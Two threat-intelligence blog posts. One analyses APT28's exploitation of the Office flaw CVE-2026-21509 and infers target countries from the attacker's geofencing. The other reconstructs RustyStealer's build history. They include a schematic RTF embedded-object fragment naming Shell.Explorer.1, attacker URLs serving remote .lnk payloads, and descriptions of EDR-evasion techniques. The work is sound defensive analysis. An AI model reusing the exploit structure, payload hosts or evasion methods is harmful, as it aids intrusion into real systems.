APT28: Geofencing as a Targeting Signal (CVE-2026-21509 Campaign)

by Robin Dost


EDIT: 04.02.2026:
I have YARA Rules available for detection, contact me at contact@robin-dost.de if you need them.

After publishing this article, I received technical feedback regarding the root cause of CVE-2026-21509. Based on that input, I corrected several parts of the analysis.

Update Notes:
The vulnerability does not rely on malformed OLE objects, and WebDAV is not part of the exploit primitive. CVE-2026-21509 is caused by an allowlist gap around Shell.Explorer.1, which Office still instantiates. WebDAV is only used as a delivery mechanism.
The article has been updated accordingly.


Since the beginning of this year, we have again observed an increased number of attacks by APT28 targeting various European countries. In multiple campaigns, the group actively leverages the Microsoft Office vulnerability CVE-2026-21509 as an initial access vector.

This article focuses on how CVE-2026-21509 is used in practice, how relevant IOCs can be extracted efficiently from weaponized Word documents, and how the actor's own geofencing can be leveraged to infer operational target regions.

Before diving into the analysis, a brief look at CVE-2026-21509 itself.

Understanding CVE-2026-21509

CVE-2026-21509 comes down to a simple allowlist gap in Office.

Microsoft has been blocking browser OLE objects like Shell.Explorer and Shell.Explorer.2 for years. Shell.Explorer.1 just never made it onto that list.
Attackers embed a Shell.Explorer.1 OLE object inside an RTF document.
When Word parses the file, the object gets reconstructed and instantiated normally, because from Office's point of view it is still considered allowed.
No macros. No scripts. No fancy exploit chain.
Just a forgotten COM class.
Once loaded, the embedded browser object calls Navigate() and points to a remote resource, usually a .lnk file, which then becomes the actual execution vector.
The document itself carries no payload.
Its only purpose is to reach a state where Shell.Explorer.1 is active and allowed to fetch external content.
Variations of this technique have been public since at least 2016-2018.
CVE-2026-21509 merely formalizes Microsoft's belated acknowledgement that this specific ProgID should have been blocked a long time ago.
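Schematically, the weaponized RTF only needs an embedded-object group whose OLE 1.0 header names the forgotten ProgID. The fragment below is purely illustrative, not a byte-accurate sample (the inline annotations are not valid RTF):

```rtf
{\rtf1
  {\object\objemb
    {\*\objdata
      01050000            OLE 1.0 version
      02000000            FormatID = 2 (embedded object)
      11000000            class-name length (17, incl. NUL)
      5368656c6c2e4578706c6f7265722e3100
                          "Shell.Explorer.1\0"
      ...                 reconstructed OLE storage follows
    }
  }
}
```

The class name is the whole trick: Word sees a valid embedded object, looks up the ProgID, and finds nothing on the blocklist.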

tldr;

APT28 abuses CVE-2026-21509 by embedding a forgotten OLE browser object (Shell.Explorer.1) into RTF documents.
Office happily instantiates it, the object navigates to a remote .lnk, and that's your execution path.
An allowlist gap that somehow survived for years.
The documents themselves contain no payload.
They only exist to get Office into a state where external shortcut files can be fetched. From there, the real infection chain starts.

Analyzed Samples

For this analysis, I looked at the following samples:

  • c91183175ce77360006f964841eb4048cf37cb82103f2573e262927be4c7607f
  • 5a17cfaea0cc3a82242fdd11b53140c0b56256d769b07c33757d61e0a0a6ec02
  • b2ba51b4491da8604ff9410d6e004971e3cd9a321390d0258e294ac42010b546
  • fd3f13db41cd5b442fa26ba8bc0e9703ed243b3516374e3ef89be71cbf07436b
  • 969d2776df0674a1cca0f74c2fccbc43802b4f2b62ecccecc26ed538e9565eae

When I receive potentially malicious Word documents, my first step is usually to run oleid. In most common malicious documents, this already reveals macros, external references or other active content.

In this case, oleid reports a clean file. No macros, no external relationships, no obvious indicators.

This is expected.

The document is not a classic OLE container but an RTF file. In RTF, embedded objects are stored as hexadecimal data inside the document body using control words such as \object and \objdata. These objects do not exist as real OLE structures until Word parses the document and reconstructs them in memory.

oleid operates at the container level. It can only detect features that already exist as structured objects in the file. Since the embedded OLE data is still plain text at this stage, there is nothing for oleid to flag.

The exploit surface of CVE-2026-21509 only becomes visible after this reconstruction step. Tools like rtfobj replicate this part of Word's parsing logic by extracting and rebuilding the embedded objects from the RTF stream.

rtfobj -s all b2ba51b4491da8604ff9410d6e004971e3cd9a321390d0258e294ac42010b546.doc

Once reconstructed, the embedded objects resolve to Shell.Explorer.1. Some tools flag the CLSID as unknown, but Windows loads it normally. The containers themselves are valid OLE objects. The vulnerability is triggered solely because this specific ProgID is still allowed.
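The core of what rtfobj does here can be approximated in a few lines of stdlib Python. This is a simplified sketch of my mental model, not the real tool: actual RTF can split the hex across nested groups and \bin runs, which oletools handles properly.

```python
import re

def extract_objdata(rtf: bytes) -> list[bytes]:
    """Pull \\objdata hex blobs out of an RTF stream and decode them.

    Simplified: only grabs contiguous hex (plus whitespace) directly
    following an \\objdata control word.
    """
    blobs = []
    for m in re.finditer(rb'\\objdata\s*([0-9a-fA-F\s]+)', rtf):
        hexdata = re.sub(rb'\s+', b'', m.group(1))
        if len(hexdata) % 2:            # drop a dangling half byte
            hexdata = hexdata[:-1]
        if hexdata:
            blobs.append(bytes.fromhex(hexdata.decode('ascii')))
    return blobs
```

Feeding the decoded blobs into an OLE parser (or just hexdumping them) then reveals the reconstructed object headers.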


After extracting the embedded objects, I inspected the resulting files using xxd. At this stage, strings did not yield anything particularly useful, which is not surprising given that the document is not designed to carry a readable payload.

From this data, the following strings could be extracted:


file://wellnessmedcare.org/davwwwroot/pol/Downloads/document.LnK?init=1
file://wellnessmedcare.org/buch/pol/Downloads/document.LnK?init=1
file://wellnessmedcare.org@ssl/cz/Downloads/document.LnK?init=1
file://freefoodaid.com@80/documents/2_2.lNk?init=1
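These navigation targets are typically stored as UTF-16LE inside the reconstructed objects, which is why plain `strings` often misses them. A small stdlib-only scanner (a hypothetical helper, not the exact tooling I used) finds them by matching ASCII characters interleaved with NUL bytes:

```python
import re

def find_wide_urls(data: bytes) -> list[str]:
    """Extract UTF-16LE 'file' URLs from a binary blob.

    Looks for 'file' encoded as ASCII-with-NULs, then keeps matching
    printable-ASCII/NUL pairs until the run ends.
    """
    pattern = re.compile(rb'f\x00i\x00l\x00e\x00(?:[\x20-\x7e]\x00)+')
    return [m.group().decode('utf-16le') for m in pattern.finditer(data)]
```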


Why file://…/davwwwroot/…lnk appears in these samples

Some in-the-wild samples use paths like:

file://wellnessmedcare.org/davwwwroot/pol/Downloads/document.lnk

This is an operational choice rather than a technical requirement of CVE-2026-21509.
The same behavior can be triggered using plain HTTP or HTTPS URLs.
The exploit primitive is simple: the embedded Shell.Explorer.1 object calls Navigate() to a remote URI.
What happens next is handled by the legacy Internet Explorer engine (ieframe.dll), which does not implement modern protections such as SmartScreen or Smart Application Control.
WebDAV mainly provides delivery convenience.
It exposes remote files as filesystem-like objects via the Windows WebClient service, but it does not change the exploit mechanics.
As already mentioned, the Word document itself contains no payload and performs no execution.
Its only purpose is to instantiate Shell.Explorer.1 and trigger navigation to a remote shortcut file.
The .lnk becomes the actual execution vector. When accessed, the user is prompted to open or save the file, and any follow-on activity happens outside the document.
The query parameter is client-side only and used to avoid caching. It has no functional relevance for the server.

Identifying Targets

While analyzing the documents and extracted URLs, it became apparent that they reference potential target regions:

  • /cz/ -> Czech Republic
  • /buch/ -> Bucharest / Romania
  • /pol/ -> Poland

Additional indicators inside the Word documents further support this assessment:

  • Romanian language content
  • References to Ukraine
  • Mentions of Slovenia
  • EU-related context

None of this is accidental.

At this point, the next step is validation. Russian threat actors are known to rely heavily on geofencing, and APT28 is no exception. Fortunately, this behavior can be turned into a useful source of intelligence for us ^-^

Turning Geofencing into Intelligence

The first step was to take a closer look at the domains extracted from the samples:

wellnessmedcare.org  ->  193.187.148.169
freefoodaid.com      ->  159.253.120.2

What stands out here is the choice of hosting locations.
Both IP addresses resolve to providers in Romania and Moldova. It is reasonable to assume that these locations were selected based on the campaign's intended target regions.

Next, I attempted to replicate the WebDAV requests generated by Windows in order to test the observed geofencing behavior.
To do this, I executed the document in a sandbox and captured the resulting network traffic.

Geofence Analysis

To validate the geofencing, I needed to determine which proxy locations were required to access the malicious resources without being blocked.
After identifying suitable proxies, I performed test requests using a custom script, once without a proxy and once using a Romanian proxy.

Without proxy:

With proxy:

The result is fairly clear. Requests originating from outside the expected regions are rejected with HTTP 403, while requests routed through a Romanian proxy succeed. This pattern can be used to validate likely operational target regions.
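My probing script boiled down to the pattern below. This is a minimal sketch under stated assumptions: one HTTP proxy per test country, and function/variable names are mine, not the original tooling.

```python
import urllib.request
import urllib.error

def probe(url, proxy=None, timeout=10):
    """Request `url`, optionally through an HTTP(S) proxy, return the status code."""
    handlers = []
    if proxy:
        handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
    opener = urllib.request.build_opener(*handlers)
    try:
        return opener.open(url, timeout=timeout).getcode()
    except urllib.error.HTTPError as e:
        return e.code            # e.g. 403 outside the allowed regions

def allowed_regions(results):
    """Given {country: status_code}, return the countries that were served content."""
    return sorted(country for country, status in results.items() if status == 200)
```

Iterating `probe` over one proxy per country and feeding the status codes into `allowed_regions` reproduces the per-country picture.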

Out of 114 tested countries, only three were allowed access: Czech Republic, Poland and Romania. This aligns perfectly with the indicators observed earlier in the documents and URLs.

As this example shows, defensive measures such as geofencing can provide valuable intelligence when analyzed properly. Even access control mechanisms can leak information about an actor's operational focus if you know where to look.
The second domain, freefoodaid.com, was already offline at the time of analysis. Given how short-lived APT28 infrastructure tends to be, this is hardly surprising. It is reasonable to assume that similar geofencing behavior would have been observable there as well, but for demonstration purposes, the remaining data is more than sufficient.

How to protect against these attacks

Update Microsoft Office and enforce a structured update routine.
Treat unexpected Word documents as untrusted and have them analyzed before opening them.
(or stop using windows :3)

Conclusion

CVE-2026-21509 works because it fits neatly into how Office processes documents today.
The exploit relies on Office instantiating an allowed OLE object during normal parsing, not on macros or embedded payloads, which makes it easy to overlook during initial analysis.
The tradecraft follows a familiar pattern.
Remote shortcut files and strict geofencing have been used by APT28 before and continue to show up in current campaigns.
WebDAV appears here mainly as a delivery detail.
The technique is stable, requires little user interaction, and sidesteps many modern Office protections by falling back to legacy browser behavior.
At the same time, this setup exposes useful signals.
Geofencing decisions, hosting locations and access behavior provide insight into intended target regions when tested systematically.

In this case, the infrastructure behavior aligns closely with the indicators found inside the documents.
From an analytical POV, the value lies less in the exploit itself and more in what can be inferred from how it is deployed and constrained.

RustyStealer: Your Compiler Is Snitching on You


by Robin Dost

As already mentioned in my last MuddyWater article, I originally planned to take a closer look at the remaining RustyWater samples in the hope of finding additional leftover artefacts. But: writing a pure “let’s grep a few more binaries for leftovers” follow-up article sounded painfully boring, both to read and to write. So instead of doing that, I decided to version the individual samples properly and build a small change-tracking timeline around them.

Mostly out of curiosity, partly out of stubbornness.
At least this way we get something that resembles actual analysis rather than archaeological string hunting.

Before diving into version diffs and timelines, it’s worth briefly grounding what we’re actually dealing with here, without turning this into a full-blown reverse engineering novella.

RustyStealer (sometimes referenced as RustyWater, Archer RAT or related variants in public reporting) is a Rust-based information stealer / RAT that has been observed in MuddyWater-attributed campaigns. In practice it behaves like a fairly typical post-compromise implant: basic host reconnaissance, security product awareness, persistence via registry, C2 communication and modular task execution. Nothing magical, nothing revolutionary, just a modernized tooling stack implemented in Rust instead of the usual C/C++ ecosystem. Here’s an article from cloudseek.com if you are interested in the details of its delivery and execution behavior.


And that’s exactly where this article deliberately does not go: this is not a line-by-line teardown of every decoding routine, syscall wrapper or math loop. There are already reports on the internet that lovingly explain how a single function increments a counter.

What I’m interested in instead is how this thing evolves over time and how to track it:

How do the binaries change between builds?
Which libs appear or disappear?
When does the architecture shift?
Where do experiments get rolled back?
Which parts get hardened, obfuscated or simplified?

The goal is to treat this malware family more like a software project with a messy commit history than a static artifact. By correlating compile timestamps, dependency fingerprints, fuzzy hashes, embedded artefacts and targeted code diffs, we can reconstruct a surprisingly coherent development timeline and extract signals about tooling maturity, experimentation phases and operational priorities.

And honestly: that’s way more fun than grepping strings all day, and more useful for my threat actor research.

For the analysis I used the following samples:

Hash (SHA256)                                                     Date
e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd  08.01.2026
ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b8068220914  08.01.2026
7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58  08.01.2026
e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e83108  08.01.2026
a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c79  10.01.2026

My First Step: I always start with the most low-effort signal: raw strings.
Sometimes you get lucky and developers leave behind absolute paths, usernames, toolchain artefacts or other accidental breadcrumbs.

The first thing I wanted to verify was whether any additional user paths were embedded in the samples:

for x in *.exe; do r="$(strings "$x" | grep 'C:')"; if [ -n "$r" ]; then printf '%s %s\n\n' "$x" "$r"; fi; done

And yes, in two of the binaries we do indeed find another leftover artefact:

C:\Users\Bruno\Desktop\art.exe
C:\Users\Jacob\...

Just to be clear: the developer is almost certainly not named Bruno/Jacob.
This is simply the username of the build environment used at that time. Still, it gives us a nice anchor point when correlating samples later on.

Dependency extraction and library fingerprinting:

Next, I wanted to extract the dependency information from the binaries:

# get llvm strings
for x in *.exe; do r="$(strings "$x" | grep 'llvm')"; if [ -n "$r" ]; then printf '%s %s\n\n' "$x" "$r"; fi; done
# get crates with version and write to file sample.exe.strings
for x in *.exe; do strings "$x" | grep "crates\.io-" | cut -d'\' -f5 | sort | uniq >> "$x.strings"; done

This gives us a list of Rust crates and libraries that were present at build time:

From this output I consolidated a full list of all dependencies observed across all samples.
It already allows a first sanity check: are all samples built from the same dependency set or do we see deviations?

In total, the consolidated list contains 50 libraries; however, each individual sample only exposes around 44-45 crates.
That already tells us that not all builds are identical.

Here is the full list of observed libraries:

Library            Version
aead               0.5.2
aes                0.8.4
aes-gcm            0.10.3
atomic-waker       1.1.2
base64             0.22.1
bytes              1.10.1
cipher             0.4.4
ctr                0.9.2
futures-channel    0.3.31
futures-core       0.3.31
futures-util       0.3.31
generic-array      0.14.7
h2                 0.4.12
hashbrown          0.15.5
http               1.3.1
httparse           1.10.1
http-body-util     1.7.0
hyper              1.7.0
hyper-tls          0.6.0
hyper-util         0.1.16
icu_collections    2.0.0
icu_normalizer     2.0.0
idna               1.1.10
indexmap           2.11.0
ipnet              2.11.0
iri-string         0.7.8
mio                1.0.4
native-tls         0.2.14
percent-encoding   2.3.2
rand               0.6.5
rand_core          0.4.2
rand_hc            0.1.0
rand_jitter        0.1.4
reqwest            0.12.23
schannel           0.1.27
slab               0.4.11
smallvec           1.15.1
socket2            0.6.0
tokio              1.47.1
tokio-native-tls   0.3.1
tokio-util         0.7.16
tower              0.5.2
universal-hash     0.5.1
url                2.5.7
utf8_iter          1.0.4
want               0.3.1
windows-registry   0.5.3
winreg             0.55.0
rustc-demangle     0.1.24
rustc-demangle     0.1.26

Since we now know that differences exist, I built a per-sample matrix to visualize which libraries appear in which binary:

This makes deviations immediately visible without having to manually diff text dumps.

Compile timestamps

Before grouping anything, I also checked when the individual binaries were compiled.

This can be extracted using:

for x in *.exe; do printf '%s ' "$x"; objdump -x "$x" | grep "Time/Date"; done

Result:

File Hash                                                         Compile Date
ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b8068220914  Tue Sep 23 10:44:52 2025
e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd  Sun Oct 19 21:17:34 2025
e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e83108  Sun Nov 16 23:41:42 2025
a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c79  Sun Nov 16 23:41:42 2025
7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58  Mon Jan 5 06:33:07 2026

TLSH similarity analysis

As a final preprocessing step I generated TLSH hashes for all samples.

TLSH is a fuzzy hashing algorithm that does not aim for exact equality, but instead quantifies structural similarity between files.
Unlike cryptographic hashes, TLSH allows us to estimate how closely two binaries resemble each other internally even if they differ in resources, padding, timestamps or small code changes.

For our malware analysis purpose, this is especially useful when clustering variants, detecting rebuilds and separating development branches.

To make the distances reproducible, I wrote a small script that computes TLSH values directly from the binaries and performs pairwise comparisons:
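A sketch of that comparison harness is shown below. It assumes the `py-tlsh` package for the actual digests; the distance function is injected so the pairwise logic itself stays library-agnostic.

```python
from itertools import combinations

def pairwise_distances(hashes: dict, diff) -> dict:
    """Compute all pairwise distances between labelled digests.

    `hashes` maps sample name -> TLSH digest; `diff` is a distance
    function such as tlsh.diff. Returns {(a, b): distance}.
    """
    return {(a, b): diff(hashes[a], hashes[b])
            for a, b in combinations(sorted(hashes), 2)}

if __name__ == "__main__":
    # Real usage with the py-tlsh package (assumed installed):
    try:
        import glob
        import tlsh
        digests = {p: tlsh.hash(open(p, "rb").read()) for p in glob.glob("*.exe")}
        for pair, dist in sorted(pairwise_distances(digests, tlsh.diff).items(),
                                 key=lambda kv: kv[1]):
            print(pair, dist)
    except ImportError:
        pass  # py-tlsh not installed
```

Sorting the pairs by distance already makes the clusters described below visually obvious.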

Clustering the samples

With all of this data available, we can now perform a reasonably robust clustering of the samples.

The key point here is that no single metric is deciding on its own. Instead, the correlation of multiple independent signals matters:

  • TLSH similarity
  • Compile timestamps
  • Library fingerprints
  • Embedded user artefacts

Cluster 1: Core codebase

The first cluster represents the actual core of the codebase and contains the samples:

  • e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd
  • e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e83108
  • a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c79

All three share identical library dependencies and were compiled close together in time; two of them even share the exact same compile timestamp. One sample also contains the user artefact "Bruno", which further points to a consistent build environment.

Despite moderate TLSH distance to some variants, the internal similarity inside this cluster remains high enough to confidently assume a shared codebase.

Cluster 2: Early feature branch

A second, clearly separable cluster consists solely of:

  • ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b8068220914

This sample extends the otherwise stable library stack with an additional winreg dependency while remaining TLSH-close to the core samples.
Combined with its earlier compile timestamp, I think this was a temporary feature branch or experiment rather than a fully independent development line.

Cluster 3: Later modernization branch

The third cluster is represented by:

  • 7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58

The build differs by multiple additional libraries and introduces a newer version of rustc-demangle.
Additionally, a different username ("Jacob") appears in the artefacts.
While the TLSH distance still places this sample within the same family, it consistently sits outside the tighter core cluster range.
Taken together, this strongly indicates a later development branch with an updated toolchain and likely expanded functionality.

Overall, this results in a three-tier model:

  • A stable core cluster forming the technical baseline
  • An early feature branch with minimal extension
  • A later modernization branch with a changed toolchain and build environment

My clustering is not driven by hash similarity alone; it only becomes reliable through the combined temporal, structural and artefact-based correlation. It also provides insight into development practices, build discipline and potential role separation within the malware's development process.

Version mapping

Based on this clustering, I derived the following version mapping:

Version | Sample (SHA256) | Compile Date | Cluster | Notes | Developer
v0.9  | ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b8068220914 | 23.09.2025 | Registry branch | + winreg library (feature experiment) | unknown
v1.0  | e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd | 19.10.2025 | Core | Baseline toolchain | Bruno
v1.1  | e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e83108 | 16.11.2025 | Core | Parallel build, stable stack | Bruno
v1.1b | a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c79 | 16.11.2025 | Core | Parallel build (same timestamp) | Bruno
v2.0  | 7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58 | 05.01.2026 | Jacob branch | New libs + new rustc-demangle | Jacob

At this point we already have a solid structural overview without having touched the actual code yet. This part comes next.

For the code comparison I use Ghidra's Version Tracking module. The versions will be analyzed in the following pairs:

v0.9 <-> v1.0
v1.0 <-> v1.1
v1.1 <-> v2.0

So three comparisons in total, which honestly is still a very manageable workload.

Let’s get started 🙂

Version Tracking workflow

I won’t go into a full tutorial on how Ghidra's Version Tracking works. Instead, I’ll briefly outline my simple workflow for today.

First, I set the confidence filter to:

-1.0 -> 0.950

Everything above that can usually be assumed identical across samples. I select all those findings and accept them in bulk.

For the remaining findings, I set up a small quality-of-life shortcut:

SHIFT + T = Assign Tag

Then I filter the results by:

  • Tag (ascending)
  • Type (ascending)
  • Status (ascending)

and tighten the confidence filter slightly to:

-1.0 → 0.95

This gives me a clean view of all unresolved function-level differences without assigned tags, exactly the changes that matter most when identifying structural evolution.

It looks roughly like this:

The workflow is simple:

  • Select the next finding
  • Open code comparison (SHIFT + C)
  • If identical -> accept (SHIFT + A)
  • If different -> assign a tag for later analysis (SHIFT + T)

Once accepted or tagged, the finding disappears from the filtered view and I repeat the process.

I iterate this until all relevant changes are reviewed and documented.


RustyStealer: Evolution from v0.9 to v2.0

What changed, what failed and what the developer learned

During a longitudinal analysis of multiple RustyStealer builds, four development stages became visible to me: an early baseline version (v0.9), a cleanup iteration (v1.0), a short-lived performance refactor (v1.1) and a more fundamental architectural shift in v2.0.

Rather than showing linear feature growth, the samples show a realistic iterative engineering process with experimentation, rollback and eventual consolidation toward stealth and reliability.

This analysis focuses on behavioral deltas inferred from import-level changes and binary artifacts.


Version 0.9: Early baseline and rough edges

The earliest observed build (v0.9) represents a relatively raw implementation.

Notable characteristics:

  • Dependency artifacts included unused crates such as winreg / windows-registry (likely early experimentation or leftover scaffolding)
  • No meaningful behavioral differences compared to later v1.0 builds
  • No advanced memory manipulation or cryptographic primitives observed
  • Limited internal abstraction and minimal architectural complexity

From a development POV, v0.9 looks like a staging build that still contained residual dependencies and experimental code paths that were not yet cleaned up.


Version 1.0: Cleanup and stabilization

The transition from v0.9 to v1.0 did not introduce meaningful functional changes. The most visible difference was the removal of unused dependency artifacts (such as the winreg crate) without any observable change in imports or runtime behavior.

This looks more like a dependency cleanup than a behavioral refactor.

Key observations:

  • No changes in imported Windows APIs
  • No observable change in capabilities or execution flow
  • Binary differences consistent with rebuild noise and dependency graph cleanup

This phase reflects basic project hygiene rather than feature development.


Version 1.1: Performance experiment and internal refactor

Version 1.1 marks the first technically ambitious change.

Major changes observed:

Introduction of asynchronous and overlapped file I/O:

  • ReadFile, NtReadFile
  • GetOverlappedResult, CancelIo
  • Event-based synchronization (CreateEventW, WaitForMultipleObjects)

Migration to modern Windows path resolution via SHGetKnownFolderPath.

Explicit memory cleanup for shell APIs using CoTaskMemFree.

Removal of host fingerprinting:

  • GetComputerNameExW
  • GetUserNameW
  • NetGetJoinInformation

This version appears to have attempted:

  • Faster and more scalable file harvesting.
  • Cleaner filesystem abstraction.
  • Reduced behavioral noise by temporarily disabling host profiling.

However, asynchronous I/O pipelines significantly increase complexity and often cause instability in real-world environments.
To me, this version looks more like a technical experiment than a long-term production design.

Additional findings from later code diffs

Looking at later builds and comparing them back to this branch reveals several important follow-up changes that appear to originate from the 1.1 refactor.

String handling and Defender artefacts

Older builds still expose cleartext strings such as direct Windows Defender directory paths, making static detection trivial.
In later builds these strings disappear entirely and are reconstructed at runtime using multiple XOR-based decoding routines and different key constants.

I believe the outcome of the 1.1 refactor was the realization that static strings were becoming a liability, leading to systematic runtime string decryption in subsequent versions.

Collection handling and stability

Later builds include additional safety checks when aggregating dynamic collections (explicit overflow protection when joining result sets).
The same logic exists in earlier builds but is less defensive and less structured.

This points to stability issues encountered when processing larger data sets, which may have been discovered during or shortly after the scalability experiments introduced in version 1.1.

Modular architecture continuity

Both older and newer builds continue to reference internal Rust modules such as:

  • src\modules\persist.rs
  • src\modules\interface.rs
  • src\modules\information.rs
  • src\modules\detect_av.rs

This confirms that the internal refactor in 1.1 successfully established a modular layout that later versions could iterate on without further structural changes.

Toolchain and build artefacts

Later samples expose more Rust toolchain artefacts (stable-x86_64 paths and related metadata) and show noticeable hash divergence despite similar functionality.
This looks like a change in compiler version or build environment after this refactor phase, which may also explain subtle behavioral and binary layout differences between closely related samples.

My take

Version 1.1 looks like the point where the developers started stress testing their own architecture.

They might have pushed performance and concurrency, simplified some noisy host profiling and cleaned up API usage.
The follow-up changes visible in later diffs show that this experiment exposed two main pain points:

  • Static strings and predictable artefacts were too easy to signature.
  • Increased scale and concurrency exposed stability issues in collection handling.

Instead of doubling down on complex async I/O, later versions appear to focus more on obfuscation, robustness and operational reliability, while keeping the modular structure introduced here.

imo 1.1 feels less like a production release and more like a learning phase that shaped the technical direction of everything that followed.


Version 2.0: Architectural consolidation and stealth optimization

Version 2.0 represents a clear update in development priorities.

Instead of further expanding the async pipeline, the developer reverted many of the experimental components and focused on stealth, operational control and internal maturity.

Major changes observed:

Removal of asynchronous file pipeline

All overlapped I/O and event-based sync primitives present in v1.1 have been fully removed in v2.0 and later builds. No replacement async scheduling mechanisms (IOCP, APCs, worker pools or deferred execution patterns) are observable in the call graph.

The runtime execution flow is now strictly sequential, with simplified synchronization primitives replacing the earlier concurrency model.
It looks like the experimental async pipeline was abandoned in favor of a more predictable and operationally stable execution model.
It reduces architectural complexity, lowers race condition risk and improves long-term stability across victim environments.

Reintroduction of host fingerprinting

Host identification APIs returned:

  • GetComputerNameExW
  • GetUserNameW
  • NetGetJoinInformation

The focus returns to victim profiling, campaign correlation and backend attribution logic.
The temporary removal in v1.1 now appears to have been an experimental privacy / noise-reduction phase rather than a permanent design direction.

Migration towards native NT APIs

Several subsystems were migrated towards native system calls:

  • Named pipes moved from CreateNamedPipeW to NtCreateNamedPipeFile
  • File handling introduced NtOpenFile

This reduces visibility to user-mode API hooking and increases resistance against common EDR userland instrumentation.

Introduction of cryptographic randomness and entropy hardening

Version 2.0 introduces a dedicated entropy generation pipeline based on SystemFunction036 (RtlGenRandom), replacing the previously implicit and largely deterministic behavior.

Rather than simply requesting random bytes, the implementation builds a full entropy pool that combines cryptographically secure randomness with adaptive jitter-based sampling and internal quality validation.
The generated entropy is statistically evaluated at runtime and rejected if it fails basic stability and distribution thresholds.
Only entropy that passes these health checks is propagated further into the execution flow.

The call chain shows that the generated randomness directly feeds into subsequent runtime decoding routines, where multiple obfuscated data blocks are reconstructed through XOR-based transformations and dynamic keys. In earlier versions, these decode paths relied almost entirely on static constants and predictable transformations.
In v2.0, parts of this process become entropy-dependent and therefore non-deterministic across executions.
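To illustrate the difference (purely schematic Python, not code lifted from the samples): a static-key XOR decoder produces identical intermediate state on every run, while masking the data with a fresh random session key makes the in-memory intermediates unique per execution.

```python
import os

def xor_decode(blob: bytes, key: bytes) -> bytes:
    """Classic rolling-XOR decode, as seen in the older builds (static key)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))

def xor_recode_with_entropy(blob: bytes) -> tuple[bytes, bytes]:
    """Schematic v2.0-style variant: re-mask the data with a fresh random
    session key so internal state differs on every execution.
    Returns (session_key, masked_blob); decoding both layers recovers plaintext."""
    session_key = os.urandom(16)   # stand-in for SystemFunction036 / RtlGenRandom
    return session_key, xor_decode(blob, session_key)
```

The static variant can be signatured once; the entropy-masked variant forces analysis tooling to recover the per-run key before any deterministic matching works.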

From an operational perspective this has several implications:

  • Runtime decoding behavior becomes less reproducible for static analysis and sandbox instrumentation.
  • Signature-based detection and clustering become more fragile, as internal state and derived values differ per execution.
  • Correlation across samples using hash similarity, instruction-level signatures or deterministic unpacking pipelines becomes significantly harder.
  • The malware gains a higher degree of resilience against emulation environments with weak or manipulated entropy sources.

While the mechanism could theoretically support use cases such as object naming, session identifiers or cryptographic material, its integration into the decode pipeline indicates that the primary motivation is obfuscation hardening and stealth rather than feature expansion.

It marks a shift in development priorities: the developers invest in making existing functionality harder to observe, reproduce and classify.

Memory protection manipulation (VirtualProtect)

VirtualProtect appears in v2.0, but not as a generic “unpacking” indicator.

It is used to flip a read-only dispatch table to writable just long enough to store dynamically resolved API pointers, then lock it back down.
That's consistent with the shift towards runtime API resolution and NT-level calls: fewer static imports, less signature surface and a resolver layer that is harder to tamper with or hook trivially.

Internal synchronization refactor

Thread state handling was refactored away from TLS primitives and migrated towards modern synchronization APIs (InitializeCriticalSectionEx).

I think it’s for architectural cleanup and improved concurrency control.

Obfuscation hardening and decoder abstraction

Compared to version 1.1, version 2.0 further abstracts string decryption and reconstruction logic.
Previously visible XOR decoders with fixed constants and static data offsets were refactored into more generic reconstruction helpers and indirect decode routines.

This significantly reduces static signature stability and increases the effort required for automated clustering and YARA-style detection.

Improved memory lifecycle management and cleanup paths

Version 2.0 introduces more explicit cleanup sequences, callback-based destructors and tighter buffer lifecycle handling.

Multiple teardown paths now explicitly free dynamically allocated buffers, invoke destructor callbacks and normalize internal state after large collection operations.
It might be an effort to reduce memory leaks, crash probability and long-running instability during high-volume data processing.

Build pipeline evolution

Build artifacts show a different Rust toolchain and build environment compared to version 1.1.
Toolchain paths shifted from shared “Archer” layouts towards user-local rustup environments, explaining observed TLSH divergence despite largely stable runtime behavior.

This reflects internal "build pipeline" changes rather than functional malware changes.

Summary

Version 2.0 prioritizes:

  • Simplification and rollback of risky experimental I/O designs
  • Stronger stealth via native API usage and obfuscation hardening
  • Improved runtime stability and memory hygiene
  • Reintroduction of host profiling for operational correlation
  • Internal architectural consolidation rather than feature expansion

Overall, this release reflects a stabilization phase where operational reliability and detection resistance outweigh rapid feature development.


Conclusion

If there’s one takeaway from this exercise, it’s that even relatively “boring” commodity implants become surprisingly interesting once you stop treating them as static blobs and start treating them like evolving software projects.

By correlating build artefacts, dependency drift, fuzzy hashes and targeted code diffs, we can reconstruct a fairly coherent development timeline for RustyStealer without having to reverse every single function into oblivion. We see experimentation phases (hello, async pipeline), rollbacks when ideas don't survive real-world friction, hardening towards stealth (dynamic API resolution, entropy injection) and the usual toolchain churn that comes with real developers shipping real code, even if that code happens to be malware.

None of this magically turns RustyStealer into some next-gen cyber superweapon. It's still fundamentally a fairly standard implant doing fairly standard implant things.

It's also a nice reminder that "grep strings > extract a few IOCs > call it a day" only gets you so far. If you actually want to understand how an actor operates, what they experiment with and where their engineering effort goes, you have to look at trends, not snapshots.

Which admittedly takes more time, more coffee and slightly more patience than copy-pasting hashes into VirusTotal, buuuut the payoff is a much clearer picture of what's really going on under the hood.

There's also a more general lesson in all of this, imo.

